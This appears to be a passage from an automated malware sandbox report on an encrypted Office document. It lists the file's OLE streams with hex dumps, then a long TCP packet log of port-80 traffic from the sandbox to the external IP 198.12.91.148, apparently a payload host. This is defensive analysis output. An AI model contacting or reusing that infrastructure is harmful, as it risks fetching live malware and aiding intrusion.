                        Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                        General
                        Stream Path:\x6DataSpaces/DataSpaceMap
                        File Type:data
                        Stream Size:112
                        Entropy:2.7597816111
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                        Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                        Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                        General
                        Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                        File Type:data
                        Stream Size:200
                        Entropy:3.13335930328
                        Base64 Encoded:False
                        Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                        Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                        Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                        General
                        Stream Path:\x6DataSpaces/Version
                        File Type:data
                        Stream Size:76
                        Entropy:2.79079600998
                        Base64 Encoded:False
                        Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                        Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                        Stream Path: EncryptedPackage, File Type: data, Stream Size: 1214360
                        General
                        Stream Path:EncryptedPackage
                        File Type:data
                        Stream Size:1214360
                        Entropy:7.9986477778
                        Base64 Encoded:True
                        Data ASCII:. . . . . . . . ? Q . C . . . S . N . A 0 . . . . . u . . * s N w . { . . h . . . . . . . . + . . ^ . . e / . . j . R ` . < R . . . . . . . z N . . . . . Z . ? . f * . . . ~ . . . . . . Z . ? . f * . . . ~ . . . . . . Z . ? . f * . . . ~ . . . . . . Z . ? . f * . . . ~ . . . . . . Z . ? . f * . . . ~ . . . . . . Z . ? . f * . . . ~ . . . . . . Z . ? . f * . . . ~ . . . . . . Z . ? . f * . . . ~ . . . . . . Z . ? . f * . . . ~ . . . . . . Z . ? . f * . . . ~ . . . . . . Z . ? . f * . . . ~ . . . . . . Z . ?
                        Data Raw:8b 87 12 00 00 00 00 00 3f 51 fe 43 fb 97 0e 53 de 4e 83 41 30 2e e8 8b c2 e4 75 d0 1d 2a 73 4e 77 b6 7b dd fc 68 c5 fb 90 ef 92 bf 80 e6 2b d4 ae 5e a0 fd 65 2f e8 de 6a df 52 60 e9 3c 52 f4 9a ad 82 fa b6 fb 7a 4e f3 1a d0 0b 8e 5a b7 3f f0 66 2a cb b1 a4 7e bf f3 1a d0 0b 8e 5a b7 3f f0 66 2a cb b1 a4 7e bf f3 1a d0 0b 8e 5a b7 3f f0 66 2a cb b1 a4 7e bf f3 1a d0 0b 8e 5a b7 3f
                        Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                        General
                        Stream Path:EncryptionInfo
                        File Type:data
                        Stream Size:224
                        Entropy:4.52818090397
                        Base64 Encoded:False
                        Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . h . H E ' . . . . . . H . . . . . . . . . . . . . \\ . . . . . . . . = . . . . . . " = . . { 1 . d . . . . = . . . n . . z . . .
                        Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jul 22, 2021 18:18:32.092925072 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.231482029 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.238130093 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.238163948 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.379816055 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.379856110 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.379901886 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.379926920 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.380024910 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.380171061 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.515589952 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.517291069 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.517352104 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.520431042 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.520452023 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.520454884 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.520554066 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.521085024 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.522749901 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.522883892 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.522895098 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.522968054 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.523175001 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.523191929 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.523194075 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.523236036 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663486004 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663535118 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663599968 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663626909 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663638115 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663659096 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663661957 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663665056 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663686037 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663708925 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663738966 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663759947 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663764954 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663769007 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663788080 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663810015 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663815022 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663820028 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663842916 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663866997 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663872957 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663877010 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663880110 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663898945 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663922071 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663924932 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663944960 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663968086 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663974047 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663978100 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.669609070 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.669631004 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.669634104 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800498962 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800537109 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800559998 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800585985 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800609112 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800631046 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800653934 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800677061 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800677061 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800698996 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800703049 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800707102 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800721884 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800723076 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800741911 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800745964 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800765991 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800771952 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800784111 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800795078 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800813913 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800817013 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800833941 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800841093 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800853014 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800863028 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800880909 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800885916 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800899982 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800909996 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800920010 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800932884 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800949097 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800961018 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800968885 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800983906 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.801002026 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.801007032 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.801021099 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.801029921 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.801048040 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.801052094 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.801067114 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.801074982 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.801093102 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.801098108 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.801111937 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.801120043 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.801137924 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.801146984 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.801157951 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.801187992 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.814379930 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.814493895 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.815866947 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.815907955 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.817589998 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.819574118 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.819598913 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.819993973 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.820147991 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.941648006 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.941689968 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.941708088 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.941726923 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.941745996 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.941762924 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.941787004 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.941806078 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.941828966 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.941849947 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.941874981 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.941898108 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.941917896 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.941939116 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.941953897 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.941957951 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.941977978 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.941977978 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.941997051 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.942001104 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.942018032 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.942022085 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.942042112 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.942048073 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.942059994 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.942065954 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.942087889 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.942095041 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.942107916 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.942110062 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.942127943 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.942131042 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.942151070 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.942151070 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.942167997 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.942188978 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.945254087 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.964402914 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.964437962 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.964451075 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.964468002 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.964479923 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.964498043 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.964510918 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.964528084 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.964544058 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.964560986 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.964576006 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.964595079 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.964612961 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.964628935 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.964644909 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.964659929 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.964673996 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.964689016 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.964704037 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.964723110 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.964740038 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.964756012 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.964771032 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.964786053 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.979496956 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.979537010 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.979542017 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.081504107 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.081543922 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.081686020 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.083555937 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.083597898 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.083620071 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.083637953 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.083657026 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.083673954 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.083678007 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.083689928 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.083707094 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.083724022 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.083739996 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.083758116 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.083775043 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.083791971 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.083812952 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.083832026 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.083848953 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.083864927 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.083882093 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.083899975 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.083918095 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.083935976 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.083955050 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.084616899 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.086738110 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.120640039 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.120683908 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.120701075 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.120718002 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.120739937 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.120760918 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.120781898 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.127021074 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.127058983 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.127073050 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.127104044 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.128556013 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.130125046 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.130482912 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.131933928 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.131942987 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.131958008 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.131959915 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.131962061 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.131964922 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.131966114 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.131967068 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.131969929 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.131982088 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.131992102 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.132004023 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.132016897 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.132025957 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.132035017 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.132045984 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.132047892 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.132065058 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.132067919 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.132083893 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.132086992 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.132101059 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.132107019 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.132119894 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.132128954 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.132144928 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.132160902 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.134085894 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.222942114 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.222970009 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.222992897 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.223056078 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.223072052 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.225647926 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.225686073 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.225707054 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.225712061 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.225725889 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.225744009 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.225763083 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.225833893 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.225840092 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.226404905 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.226445913 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.226457119 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.226469994 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.226486921 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.226492882 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.226505995 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.226515055 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.226526022 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.226537943 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.226552963 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.226561069 CEST8049167198.12.91.148192.168.2.22
